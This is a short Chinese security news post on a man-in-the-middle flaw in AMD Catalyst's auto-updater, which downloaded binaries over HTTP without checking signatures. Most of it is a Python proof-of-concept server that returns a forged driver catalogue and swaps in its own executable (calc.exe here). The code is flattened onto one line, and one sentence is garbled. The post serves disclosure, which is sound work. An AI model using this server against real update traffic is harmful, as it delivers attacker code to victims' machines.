在2013年1月17日,AMD发布了AMD催化剂13.1,随后宣布删除自动更新的功能,当时AMD表示是因为自动更新里面存在安全问题,近日,网络爆出了该安全问题的详细信息,是因为可以利用中间人攻击劫持自动更新的请求。
漏洞存是由于:
二进制程序的下载是通过HTTP来完成的。 AMD执行前已签订了未通过验证。
这意味着,可以利用中间人攻击截获AMD技术支持网站的请求,并重定向到攻击者特制的应用页面或程序。
POC
import SimpleHTTPServer import SocketServer xml = """<?xml version="1.0" encoding="utf-8"?> <list> <Catalyst-Driver-Files> <Title>Catalyst Software Suite with .NET 4 Support</Title> <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory> <DriverLanguage>;#All;#</DriverLanguage> <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType> <FileSize>184 MB</FileSize> <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType> <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate> <RevisionNumber>12.42</RevisionNumber> <RollupSortOrder>15</RollupSortOrder> <TextMultiple1> </TextMultiple1> <TextSingle1>http://www2.ati.com/drivers/12-10_vista_win7_win8_64_dd_ccc_whql_net4.exe</TextSingle1> <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype> <ContentType>GraphicsDriverFile</ContentType> <DriverVersionSupported>;#12.42;#</DriverVersionSupported> <ID>956</ID> <Modified>2012-10-22T21:30:52-05:00</Modified> <Created>2012-10-22T21:30:52-05:00</Created> <Author>System Account</Author> <Editor>System Account</Editor> <_UIVersionString>1.0</_UIVersionString> <Attachments>0</Attachments> <TitleCN>Catalyst Software Suite</TitleCN> <TitleBR>Catalyst Software Suite</TitleBR> <TitleDE>Catalyst Software Suite</TitleDE> <TitleFR>Catalyst Software Suite</TitleFR> <TitleIT>Catalyst Software Suite</TitleIT> <TitleLA>Catalyst Software Suite</TitleLA> <DescriptionCN> </DescriptionCN> <DescriptionBR> </DescriptionBR> <DescriptionDE> </DescriptionDE> <DescriptionFR> </DescriptionFR> <DescriptionIT> </DescriptionIT> <DescriptionLA> </DescriptionLA> <TitleKR>(Catalyst Software Suite)</TitleKR> <DescriptionKR> </DescriptionKR> <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu> <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle> </Catalyst-Driver-Files> </list> """ class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): if "catalystxml" in self.path: self.send_response(200) self.send_header('Content-type','text/xml') self.end_headers() self.wfile.write(xml) return elif ".exe" in self.path: self.send_response(200) self.send_header('Content-type','application/octet-stream') self.end_headers() f = open(r"C:\Windows\System32\calc.exe", "rb") self.wfile.write(f.read()) f.close() return httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler) httpd.serve_forever()
许多应用程序可能都存在该漏洞,老外研究开发了一款工具EvilGrade,可以查找这些安全问题。
[感谢LinuxSpace投递]